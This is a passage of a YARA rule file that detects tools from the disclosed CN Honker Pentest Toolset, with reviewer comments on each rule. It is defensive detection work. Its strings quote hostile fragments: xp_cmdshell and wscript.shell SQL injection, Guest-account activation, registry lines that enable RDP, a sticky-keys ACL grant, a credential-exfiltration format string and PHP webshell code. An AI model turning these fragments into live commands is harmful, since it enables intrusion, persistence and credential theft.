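   identifiers, so the rule effectively fired on the T-SQL fragment alone.
   The duplicate is removed so that two *distinct* indicators are required,
   which is what "2 of them" reads as. Expect slightly fewer, better-qualified
   hits on files that only carry the injection payload string.
*/
rule CN_Honker_NBSI_3_0 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "93bf0f64bec926e9aa2caf4c28df9af27ec0e104"
        id = "be8d0dce-4f7f-5f18-9ed0-99fc1dc2b22f"
    strings:
        $s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide /* PEStudio Blacklist: strings */
        $s2 = "http://localhost/1.asp?id=16" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 2600KB and 2 of them
}
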
/*
   2.0.exe (DUBrute v3.0 RC3): RDP credential brute-forcer, matched on its
   status/format strings and site name. "2 of them": $s15 alone is not enough,
   and the typo in $s3 ("Loginl") is part of the artifact. A hit on a server
   is a strong lead to check for outbound RDP authentication attempts.
*/
rule CN_Honker_sig_3389_DUBrute_v3_0_RC3_2_0 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file 2.0.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "e8ee982421ccff96121ffd24a3d84e3079f3750f"
        id = "dda5eea9-da79-5f1f-bbac-9f05ba7e71c9"
    strings:
        $s0 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "Create %d IP@Loginl;Password" fullword ascii /* PEStudio Blacklist: strings */
        $s15 = "UBrute.com" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 980KB and 2 of them
}

/*
   hkmjjiis6.exe: IIS 6 related tool (a WMI IIsWebInfo query fragment is
   visible). $s19 and $s20 look like fragments of mangled/packed text rather
   than readable strings — presumably chosen as stable byte sequences from
   the sample; confirm against the hash before editing them. The 2023-01-27
   modification date indicates the string set was already revised once.
*/
rule CN_Honker_hkmjjiis6 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file hkmjjiis6.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        modified = "2023-01-27"
        score = 70
        hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
        id = "badf8224-4f09-57aa-ab16-0d70e0b3f88c"
    strings:
        $s14 = "* FROM IIsWebInfo/r" fullword ascii
        $s19 = "ltithread4ck/" ascii
        $s20 = "LookupAcc=Sid#" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 175KB and all of them
}

/*
   clearlogs.exe: the ntsecurity.nu URL identifies the publicly available
   "clearlogs" event-log wiping utility, so this rule detects that tool in
   general, not only the toolset's copy. Anti-forensics: on a hit, verify
   Windows event log continuity (e.g. log-cleared events) on the host.
*/
rule CN_Honker_clearlogs {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file clearlogs.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        modified = "2023-01-27"
        score = 70
        hash = "490f3bc318f415685d7e32176088001679b0da1b"
        id = "bfbc339e-5530-5984-94de-be1002f09ca1"
    strings:
        $s2 = "- http://ntsecurity.nu/toolbox/clearlogs/" ascii /* PEStudio Blacklist: strings */
        $s4 = "Error: Unable to clear log - " fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 140KB and all of them
}

/*
   AddUser.dll: small packed DLL (PECompact2 marker) that adds a local user
   without calling net.exe. "adduser" is generic on its own; the rule relies
   on the packer marker plus the odd $s5 token and requires all three.
   Because the sample is packed, these strings may only be visible in the
   unpacked layer or stub — verify on the hash if tuning.
*/
rule CN_Honker_no_net_priv_esc_AddUser {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file AddUser.dll"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "4c95046be6ae40aee69a433e9a47f824598db2d4"
        id = "0f99914c-9349-5870-a3e0-3a5079efdecf"
    strings:
        $s0 = "PECompact2" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "adduser" fullword ascii
        $s5 = "OagaBoxA" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 115KB and all of them
}

/*
   Injection.exe: SQL-injection tool matched on a hard-coded localhost test URL
   and an ASP page name; both strings required.

   NOTE(review): the meta "id" below is identical to the one on
   CN_Honker_Injection_transit. Rule ids are meant to be unique per rule;
   regenerate this one (placeholder: <NEW-UUID>) so tooling that keys on id
   does not merge the two rules.
*/
rule CN_Honker_Injection {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
        id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
    strings:
        $s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii /* PEStudio Blacklist: strings */
        $s7 = "jmPost.asp" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 220KB and all of them
}

/*
   SQLServer_inject_Creaked.exe: cracked SQL Server injection tool, matched on
   its default test URL and an author e-mail fragment. Very wide size bound
   (< 8110KB); both strings required.
*/
rule CN_Honker_SQLServer_inject_Creaked {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file SQLServer_inject_Creaked.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "af3c41756ec8768483a4cf59b2e639994426e2c2"
        id = "9a8a77c2-9e06-5694-8055-4480ab932520"
    strings:
        $s1 = "http://localhost/index.asp?id=2" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "Email:zhaoxypass@yahoo.com.cn<br>" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 8110KB and all of them
}

/*
   WebScan.exe: GUI front-end for wwwscan, matched on the wwwscan.exe name
   and the "WWWScan Gui" title, both as wide strings. Related rules:
   CN_Honker_wwwscan_gui and CN_Honker_WebScan_wwwscan.
*/
rule CN_Honker_WebScan_WebScan {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file WebScan.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "a0b0e2422e0e9edb1aed6abb5d2e3d156b7c8204"
        id = "1545494b-9a74-5b2e-921c-e54dd5ac4b51"
    strings:
        $s1 = "wwwscan.exe" fullword wide /* PEStudio Blacklist: strings */
        $s2 = "WWWScan Gui" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 700KB and all of them
}

/*
   GetHashes.exe: offline SAM hash extractor, matched on its usage lines and
   system-key error text ("2 of them"). Credential-access tooling; a hit
   warrants checking for SAM/SYSTEM hive copies and follow-on lateral
   movement. Complements CN_Honker_GetSyskey earlier in this set.
*/
rule CN_Honker_GetHashes_2 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
        id = "31117d2e-caf1-58c9-8525-b40b73097928"
    strings:
        $s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "GetHashes.exe $Local" fullword ascii
        $s3 = "The system key doesn't match SAM registry file!" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and 2 of them
}

/*
   Generic patcher/keygen indicators (manifest description "Patch", a
   dup2patcher.dll reference and a load_patcher symbol). Although named as a
   generic SUSP_ rule, the description and hash still point at the CN Honker
   sample it was derived from; treat hits as "cracking tool present", which
   is a policy/supply-chain concern rather than proof of intrusion.
*/
rule SUSP_Patcher_Keygen_Indicators_Jun15 {
    meta:
        description = "Sample from CN Honker Pentest Toolset"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "e32f5de730e324fb386f97b6da9ba500cf3a4f8d"
        id = "4dd65e4b-8178-5576-9740-b3c80a8127e2"
    strings:
        $s0 = "<description>Patch</description>" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "\\dup2patcher.dll" ascii
        $s3 = "load_patcher" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 4000KB and all of them
}

/*
   oracle.txt: a tiny text artifact (no MZ check, filesize < 3KB), matched on
   the word "webshell" and a group banner. The trailing space in $s1 is
   deliberate and must be kept. "webshell" by itself is common in notes and
   documentation; the size cap and the banner keep the rule specific.
*/
rule CN_Honker_Tuoku_script_oracle_2 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file oracle.txt"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "865dd591b552787eda18ee0ab604509bae18c197"
        id = "b88a0faa-1616-5f1b-80dc-6e6a2f0cb671"
    strings:
        $s0 = "webshell" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "Silic Group Hacker Army " fullword ascii
    condition:
        filesize < 3KB and all of them
}

/*
   net_packet_capt.exe: packet capture tool. Apart from the "(*.sfd)" file
   filter, the strings look like corrupted import/API names (e.g.
   "GAIsProcessorFeature"), presumably stable bytes from a packed build
   rather than readable text — verify on the hash before changing them.
   Small PE (< 50KB); all five strings required.
*/
rule CN_Honker_net_packet_capt {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file net_packet_capt.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "2d45a2bd9e74cf14c1d93fff90c2b0665f109c52"
        id = "16e19be7-3805-5e2b-baa6-20554fb7a5cf"
    strings:
        $s1 = "(*.sfd)" fullword ascii
        $s2 = "GetLaBA" fullword ascii
        $s3 = "GAIsProcessorFeature" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 1 times */
        $s4 = "- Gablto " ascii
        $s5 = "PaneWyedit" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 50KB and all of them
}

/*
   CleanIISLog.exe: IIS log entry remover, matched on a single usage line.
   One string only, so the rule is as specific as that text; the usage
   format is distinctive enough that false positives are unlikely. On a hit,
   treat IIS logs on the host as potentially tampered.
*/
rule CN_Honker_CleanIISLog {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
        id = "3931ba63-faf5-5b44-879c-105cd2812712"
    strings:
        $s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}

/*
   pwhash.exe: the usage strings are those of Quarks PwDump (NTDS/SAM hash
   dumper), and "1 of them" means either line suffices — so this rule catches
   Quarks PwDump builds in general, not just the toolset's renamed copy.
   Credential-access tooling: prioritise hits on domain controllers.
*/
rule CN_Honker_HASH_pwhash {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "689056588f95749f0382d201fac8f58bac393e98"
        id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
    strings:
        $s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them
}

/*
   cl.exe (log cleaner, not the MSVC compiler): matched on its event-log
   usage line and an IIS log error message; both required, PE under 50KB.
   Anti-forensics — a hit should trigger an event-log integrity check.
*/
rule CN_Honker_cleaner_cl_2 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file cl.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "523084e8975b16e255b56db9af0f9eecf174a2dd"
        id = "9aa36c0a-9e0f-5274-bebe-9179d81b05f7"
    strings:
        $s0 = "cl -eventlog All/Application/System/Security" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "clear iislog error!" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 50KB and all of them
}

/*
   Run.exe: small launcher wrapper around sqlmap, matched on its log file
   name, fake prompt banner and format string. Detects the wrapper only —
   sqlmap itself is Python and is not covered by this rule.
*/
rule CN_Honker_SqlMap_Python_Run {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Run.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "a51479a1c589f17c77d22f6cf90b97011c33145f"
        id = "308d929a-0f38-5db4-92c2-2a7bf25bb64f"
    strings:
        $s1 = ".\\Run.log" fullword ascii
        $s2 = "[root@Hacker~]# Sqlmap " fullword ascii
        $s3 = "%sSqlmap %s" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 30KB and all of them
}

/*
   SAMInside.exe: commercial password-hash recovery tool (InsidePro), matched
   on its vendor site and executable name. Dual-use and sometimes present on
   admin/forensic workstations; the hit is credential-access tooling presence
   and should be triaged by host role and user.
*/
rule CN_Honker_SAMInside {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file SAMInside.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "707ba507f9a74d591f4f2e2f165ff9192557d6dd"
        id = "c5ac9f0a-d1af-59c3-9c13-91153180f3d8"
    strings:
        $s0 = "www.InsidePro.com" fullword wide
        $s1 = "SAMInside.exe" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 650KB and all of them
}

/*
   wwwscan.exe (console build): matched on the example command line, the
   probe request used to fingerprint 404 behaviour, and the usage line. $s1
   is shared with CN_Honker_wwwscan_gui; the tighter size bound (< 60KB) and
   $s2/$s3 separate the console tool from the GUI.
*/
rule CN_Honker_WebScan_wwwscan {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
        id = "defe0024-f94a-560a-a9f6-b3849b41f9bb"
    strings:
        $s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
        $s3 = "<Usage>: %s <HostName|Ip> [Options]" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 60KB and all of them
}

/*
   3389.exe: RDP enablement helper. The strings show the Guest account being
   re-activated and a decoy executable name ("Microsoft Word.exe") under the
   Administrator profile. All three required, PE under 80KB. On a hit, check
   Guest account status and Terminal Server settings on the host.
*/
rule CN_Honker_sig_3389_2_3389 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file 3389.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "48d1974215e5cb07d1faa57e37afa91482b5a376"
        id = "8b2f5f6d-4d7b-561c-bd77-2de351e5aca8"
    strings:
        $s1 = "C:\\Documents and Settings\\Administrator\\" ascii /* PEStudio Blacklist: strings */
        $s2 = "net user guest /active:yes" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "\\Microsoft Word.exe" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 80KB and all of them
}

/*
   php11.txt: PHP webshell source, matched on three code fragments (a
   myshellexec('id') call, a mass .htm injection loop and a cPanel credential
   check message). No MZ check since this is text; filesize < 800KB and all
   three fragments required. Suitable for scanning web roots and uploads.
*/
rule CN_Honker_PHP_php11 {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file php11.txt"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "dcc8226e7eb20e4d4bef9e263c14460a7ee5e030"
        id = "e20eaab1-9799-5e61-9a25-3ac0dcce5f7f"
    strings:
        $s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii /* PEStudio Blacklist: strings */
        $s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "echo '[cPanel Found] '.$login.':'.$pass.\" Success\\n\";" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        filesize < 800KB and all of them
}

/*
   WebCruiserWVS.exe: web vulnerability scanner, matched on its built-in
   column-name guessing list and the product banner. Dual-use scanner; the
   banner string is unambiguous, so false positives are unlikely.
*/
rule CN_Honker_WebCruiserWVS {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file WebCruiserWVS.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "6c90a9ed4c8a141a343dab1b115cc840a7190304"
        id = "16bed1e8-a1f0-5fcf-9c03-83625a388547"
    strings:
        $s0 = "id:uid:user:username:password:access:account:accounts:admin_id:admin_name:admin_" ascii /* PEStudio Blacklist: strings */
        $s1 = "Created By WebCruiser - Web Vulnerability Scanner http://sec4app.com" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 700KB and all of them
}

/*
   Hookmsgina.dll: GINA hooking credential stealer. The named pipe and global
   event names ("WinlogonHack") and the $s2 format string — which carries
   host, domain, user and password fields — show captured logons being
   exfiltrated. All four required. A hit means interactive logon credentials
   on that host should be treated as compromised.
*/
rule CN_Honker_Hookmsgina {
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
        id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
    strings:
        $s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "Global\\WinlogonHack_Load%u" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and all of them
}

rule CN_Honker_sig_3389_xp3389 {
|
||
|
// Review: all three strings are "echo ... >> c:\reg.reg" lines, i.e. the
// binary assembles a .reg file that sets fDenyTSConnections=0 and
// TSEnabled=1 under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server -
// enabling Remote Desktop on the host. Writes to that key (and the creation
// of c:\reg.reg) are worth auditing on their own, independent of this rule.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file xp3389.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "d776eb7596803b5b94098334657667d34b60d880"
|
||
|
id = "75d23c63-ba9e-55fd-90fe-5e054d28a777"
|
||
|
strings:
|
||
|
// Disables the "deny TS connections" flag.
$s1 = "echo \"fdenytsconnections\"=dword:00000000 >> c:\\reg.reg" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// Registry key header line of the generated .reg file (truncated, not fullword).
$s2 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >" ascii /* PEStudio Blacklist: strings */
|
||
|
// Turns Terminal Services on.
$s3 = "echo \"Tsenabled\"=dword:00000001 >> c:\\reg.reg" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 20KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_CookiesView {
|
||
|
// Review: $s2 (www.baidu.com) is a generic domain and adds little on its
// own; the specificity comes from the vendor banner ($s0) and the author
// e-mail ($s1), both required by the all-of condition.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "c54e1f16d79066edfa0f84e920ed1f4873958755"
|
||
|
id = "71a43797-4b5b-5f87-a70e-ebabc00d9319"
|
||
|
strings:
|
||
|
$s0 = "V1.0 Http://www.darkst.com Code:New4" fullword ascii
|
||
|
$s1 = "maotpo@126.com" fullword ascii
|
||
|
// Generic; kept only because all-of requires the two strings above as well.
$s2 = "www.baidu.com" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 640KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_T00ls_Lpk_Sethc_v4_LPK {
|
||
|
// Review: the condition is "1 of them", so a single hit fires at score 70,
// including the rather generic "c:\1.exe" ($s4) and a loopback URL ($s1).
// $s3 looks like a cacls-style grant (everyone:F) on sethc.exe, i.e. the
// sticky-keys replacement technique, and is the most specific indicator.
// If this rule produces false positives, consider "2 of them" or requiring
// $s2 or $s3. The hash is also covered by CN_Honker__LPK_LPK_LPK below.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "2b2ab50753006f62965bba83460e3960ca7e1926"
|
||
|
id = "808f5de2-1360-521e-8939-b759e361507c"
|
||
|
strings:
|
||
|
$s1 = "http://127.0.0.1/1.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "FreeHostKillexe.exe" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// ACL grant on sethc.exe - the most specific string in this rule.
$s3 = "\\sethc.exe /G everyone:F" ascii /* PEStudio Blacklist: strings */
|
||
|
// Generic path; alone it satisfies "1 of them".
$s4 = "c:\\1.exe" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and 1 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ScanHistory {
|
||
|
// Review: $s3 is a SQL query over a "Results" table ordered by scandate and
// $s2 is the ".\Report.dat" store; the same report-file string appears in
// CN_Honker_Pk_Pker below, so the two tools presumably share a code base.
// All-of is required, so the file name ($s1) must also be present.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ScanHistory.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "14c31e238924ba3abc007dc5a3168b64d7b7de8d"
|
||
|
id = "85585cd2-c5ed-5465-bcac-b61211570055"
|
||
|
strings:
|
||
|
$s1 = "ScanHistory.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = ".\\Report.dat" fullword wide /* PEStudio Blacklist: strings */
|
||
|
// Scan-result query; a good pivot string for related tooling.
$s3 = "select * from Results order by scandate desc" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_InvasionErasor {
|
||
|
// Review: $s1/$s2 are wildcard paths under system32\config and winnt
// (targets a log/evidence wiper would enumerate); $s3 "Command1" is a
// default VB control name and $s4/$s5 are OS-version labels, so each string
// is weak on its own - the all-of condition is what keeps this rule tight.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "b37ecd9ee6b137a29c9b9d2801473a521b168794"
|
||
|
id = "03ccb643-9f92-5278-a358-65f56cf19ccc"
|
||
|
strings:
|
||
|
$s1 = "c:\\windows\\system32\\config\\*.*" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "c:\\winnt\\*.txt" fullword wide /* PEStudio Blacklist: os */
|
||
|
// Generic VB control name.
$s3 = "Command1" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Win2003" fullword ascii /* PEStudio Blacklist: os */
|
||
|
$s5 = "Win 2000" fullword ascii /* PEStudio Blacklist: os */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 60KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_super_Injection1 {
|
||
|
// Review: $s2 is a stock COMCTL32 version error and $s3 a stock MSIE 6
// user agent; only $s4 (ScanInject.log) is tool-specific. The all-of
// condition and the 2000KB bound are what limit false positives here.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file super Injection1.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "8ff2df40c461f6c42b92b86095296187f2b59b14"
|
||
|
id = "ad84c5a0-4f03-5040-bdf7-819b40a08ad2"
|
||
|
strings:
|
||
|
// Generic runtime error text.
$s2 = "Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide /* PEStudio Blacklist: strings */
|
||
|
// Generic user agent.
$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
|
||
|
// Tool-specific log file name.
$s4 = "ScanInject.log" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2000KB and all of them
|
||
|
}
|
||
|
|
||
|
